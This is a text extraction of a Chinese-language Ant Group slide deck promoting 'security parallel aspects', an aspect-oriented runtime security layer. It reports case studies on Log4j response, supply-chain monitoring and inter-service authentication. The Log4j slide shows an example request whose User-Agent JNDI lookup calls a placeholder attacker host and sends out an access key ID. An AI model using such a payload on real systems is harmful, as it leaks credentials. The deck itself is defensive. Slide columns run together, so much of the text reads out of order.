安全平行切面：下一代安全基础设施

安全平行切面 下一代安全基础设施 刘宇江(羽将) 蚂蚁集团 2022.09 蚂蚁集团 ANTGROUP 蚂蚁集团 ANTGROUP 背景介绍 安全行业的超趋势与挑战 重重挑战之下，企业迫切需要更有效的安全对抗与治理方案 网络威胁对抗合规风险治理 重大漏洞频发国际形势变化三法一典 蚂蚁集团 ANTGROUP log4Shellspring4shell 趋势俄乌冲突《网络安全法》《数据安全法》《个人信息保护法》《民法典》 对抗加剧监管趋严 安全从“奢侈品”变为“必需品” 需要新的变革 安全建设难度和治理成本不断提升，企业难以承担 对抗难度大治理成本高 挑战对抗体系建设 数据和应用复杂度爆炸 治理体系建设 传统安全体系漏洞频发系统、供应链高数据流通链路资产、链路梳业务整改推动 力不从心疲于应急速发展快速变化错综复杂理不清成本巨大 数据海量化使用方式多样化 安全体系建设的困境和解法 安全平行切面体系让企业具备精准的安全感知与干预能力，实现能力与效率的跨越式提升 蚂蚁集团 ANTGROUP 外挂式安全体系： 内嵌安全体系： 安全平行切面体系： 隔靴搔痒 绑腿走路 融合且解耦 “排期一个月，灰度两个月” 内嵌式 安全应用 安全团队业务团队安全团队业务团队安全团队业务团队 安全应用 外挂式业务应用业务应用 业务应用平行空间 ·看不清，堵不完 ·业务团队研发排期不吻合 ·安全管控与业务逻辑既融合又解耦 ·安全管控效果差 ·业务团队不响应，安全应急跟不上 ·安全能力与业务系统各自独立演进 蚂蚁集团 ANTGROUP 安全平行切面介绍 切面：程序的平行空间 面向切面编程OOP (AoP,Aspect-orientedProgramming) mixed ·AOP的概念最早是由GregorKiczales等人在1997年提出 蚂蚁集团 ANTGROUP AOP是OOP的延续，OOP从横向上区分出一个个的类来，而AOP 则从纵向上向对象中加入特定的代码，增加了一个新的维度 可以通过预编译方式和运行其动态代理实现在不修改源代码的情况 下给程序动态统一添加某种特定功能的一种技术。可以实现调用者 pointcut AOP 和被调用者之间的解耦，提高代码灵活性和可扩展性的一种实现 primary concerns AOP适合解决程序中涉及横切面(cross-cut)的系统功能，这些功pointcut 能往往用过程编程或者面向对象编程都难以解决 aspects logsecurityprofile 安全平行切面：安全防御的平行空间 安全平行切面是由蚂蚁集团研发并推广的下一代安全基础设施 安全切面保障业务与安全高速演进的同时 (AoS,Aspect-orientedSecurity) 在复杂安全风险场景下，安全切面将安·支持业务透视以完成全方位安全治理工 全能力系统化的融入技术基础设施与应 蚂蚁集团 ANTGROUP 用服务内部。 ·同时保持安全响应能力与复杂业务逻辑 的解耦以形成独立的功能切面。 作(可治) 独立、高效、精确的在应用内部直接检 测和阻断各种复杂攻击（可战） 蚂蚁集团 安全平行切面技术体系与切面平行舱ANTGROUP 应用系统 业务空间 切面平行舱 安全平行切面可通注入等技术，在不修改应用源码的情况下给程序动态添加或修改功能，并通过切面平行舱保证其有序运行，提供精准的安全内视与干预服务 切点 切面平行舱 平行舱是在切面空间内，切面应用的执行环境 单元，是切面应用调度和管控的基本颗粒度 （实现各类安全管控能力）平行舱特性 内视服务干预服务·隔离性：平行舱间具有隔离性 ·可调度：切面核心可对平行舱进行统一的调度 核心API·可管控：切面核心可对平行舱的切点范围和可执行操 切面核心 平行空间 作进行安全和稳定性控制 类似于云原生的sidecar 核心架构演进蚂蚁集团 ANTGROUP 越来越多的切面应用出现在平行空间内部，缺乏隔离与管控将导致平行空间的混乱 早期实现一代核心架构二代核心架构 隔离、调度、管控隔离、调度、管控隔离、调度、管控 。执行逻辑串行于业务逻辑，复用性低、可控性差·逻辑模块化，提高可复用性，优先级和生命周期可控·对平行舱执行逻辑的可执行范围进行精细化管控，具 ·业务依赖与注入依赖冲突，影响业务稳定·依赖隔离，作用域只限于自身，不会污染业务空间备明确行为预期，敏感操作可审计与管控，降低切面 ·异常隔离不足，注入逻辑异常必使业务失败 ·分层异常隔离，平行舱异常通过切面核心兜底，核心异可由代理逻辑兜底，最大程度保障业务稳定性 被恶意使用的可能性，保障体系的安全、可控运行 应用进程应用进程 应用进程业务空间业务空间 业务空间业务逻辑业务数据业务逻辑业务数据 参数上下文参数上下文 业务逻辑业务数据统一代理逻辑 返回值配置 统一代理逻辑 返回值配置 注入执行逻辑 参数上下文 逻辑 返回值配置隔离平行空间平行空间 平行舱平行舱平行舱平行舱 决策 干预切面应用切面应用切面应用切面应用 注入器切面核心依赖优先级依赖优先级依赖优先级权限依赖优先级权限 切面核心切面核心 决策器注入器加载器调度器决策器注入器加载器调度器访问控制器 系统服务与本地资源系统服务与本地资源 稳定耳易于接入 蚂蚁内部覆盖超过95%的应用服务，核心业务100%覆盖，整套体系足够稳定，运行至今0故障 1.切面部署2.安全运营 覆盖策略研发人员 超 运维人员应用容器 应用容器应用服务 蚂蚁集团 ANTGROUP 应用服务 切 平行空间 AspectInstaller ·无需修改业务代码，即可快速部署 ·应用一次接入，持续受益 安全团队 ·能力可持续拓展，动态升级 ·安全与业务平行演进，效率跨越式提升 蚂蚁集团 ANTGROUP 安全平行切面应用实践 安全平行切面：星球、轨道与卫星 丰富的切面应用场景，多应用有序共存 星球：业务应用空间业务应用空间->星球 切面应用->卫星 iys平行舱->卫星轨道 网络安全：RASP、IAST、平行蜜罐 数据治理：血缘分析、流转管控 。隐私保护：双重确权、尽责自证 ·运维：APM、日志标准化 卫星：切面应用。稳定性：混沌工程平台 ·仿真测试：流量录制与重放 ·国密改造：透明加密 蚂蚁集团 ANTGROUP 轨道：平行舱 蚂蚁已有40+切面应用 在蚂蚁、网商银行、阿里等均有使用 案例1：log4j应急 应用安全切面应对史诗级漏洞log4j的应急响应案例 蚂蚁集团 ANTGROUP mwareamazon in STRUTSCNVD- MINECRAFT LOG4J T TESLA 2021-95914 等级：高危 影响范围：广 利用难度：易 Solrwebex druid CLOUDFLARE 蚂蚁集团 案例1：log4j应急ANTGROUP 通过切面实现精准止血 ，防御住了40W+次真实攻击，0漏报、0误报，应急人力从6000人日降低到30人日，极大降低风险暴露时间 在抵抗攻击的同时抗住了双十二高峰流量，性能与稳定性有保障，业务0打扰平稳度过危机 Httprequest GET/index.html User-Agent:$(jndi:service://attack.server.url/?s=$(env:AcCEss_KEY_ID)) controllerbusinesslogic B> 安全切面 presentation 防护策略 Log4j2RASP切面应用管控 PoweredbyAOs ContextMapJNDIEvent LookUpLookupLookUp JVMJNDI 案例2：供应链安全监测与防护 通过切面实现供应链的持续安全监测与未知风险预防 ·可在测试环境、仿真环境或是真实业务环境中，对动态对关键sink点进行持续监测，细粒度刻画应用和供应链行为画像 ·相比对比传统的网络、系统层面的监测或静态扫描，通过切面实现的动态监测识别颗粒度更细，结果更为精准 ·能够发现攻击者的攻击尝试（-1day），提升防御性威慢，在一定程度上对oday未知风险具有预防作用 蚂蚁集团 ANTGROUP controllerbusinesslogic 安全切面 切面应用管控 防护策略白名单黑名单 presentationRASP防控策略防控策略 供应链组件 动态监控点 PoweredbyAOs 应用 持续监控 业务行为存在风险 可收敛行为应用研发流程 应用和供应链 行为监控行为画像 关键Sink点 网络请求文件读写命令执行 PoweredbyAos 案例3：构建内部服务的防御纵深 通过安全切面实现业务无感知的内部服务间鉴权 ：通过安全切面，可以在内部服务通信链路中，实现对业务透明的可信身份植入、认证与鉴权 ·对比Sidecar的方式，不会额外增加新的运维成本和计算资源开销，也能实现更细粒度的访问控制和返回控制 ·增加生产内部的防御纵深，限制边界防御被突破后的东西向探测和移动 APP1APP3 蚂蚁集团 ANTGROUP 安全切面 RPC businesslogic APP2服务间鉴权businesslogic RPC安全切面 PoweredbyAOS businesslogic服务间鉴权 PoweredbyAOs 切面应用管控 东西向流量审计授权中心 安全平行切面应用实践效果总结 ，拦截40万+次log4j2攻击，小时级完成全站精漏洞挖掘实时防御 准止血，0误拦，0漏拦，应急人力从6000 蚂蚁集团 ANTGROUP 人日降低到30人日 ·双12大促封网不受影响，平行止血加固，业务 0打扰化解危机 ·双11、双12流量洪峰值不降级，安全策略检测 遗漏率检出量攻击防护漏洞探测防护高风险攻击 60%8倍70%+90%+60+类 下降提升拦截率拦截率防御策略 资产画像隐私保护 2.2亿次/分钟接口画像凭据治理应用服务高敏接口隐私信息 70%50%27类100%100% ，Spring4Shell超危漏洞应急，获得高度认可 准确率提升完整性提升隐私风险防护鉴权防护流出识别 总结 安全平行切面：下一代安全基础设施 融入技术基础设施与应用服务内部的安全防御平行空间。 与业务逻辑解耦，可以独立、高效、精确的支撑安全可治可战任务。 蚂蚁集团 ANTGROUP 安全平行切面可以为企业带来安全效果与效率的跨越式提升扫码下载白皮书支付宝或钉钉扫码咨询 平行舱为切面应用的快速增长和有序运行奠定基础 ，简单的接入方式，可以实现快速低成本覆盖 ·具备漏洞挖掘、实时防护、隐私保护、资产画像等各类丰富的应用场景 ·经历了log4j，spring等漏洞实战并取得了出色效果 ·将通过定向开源的方式与行业共建切面生态，欢迎咨询合作 为世界带来微小而美好的改变 Bringsmallandbeautifulchangestotheworld 蚂蚁集团 ANTGROUP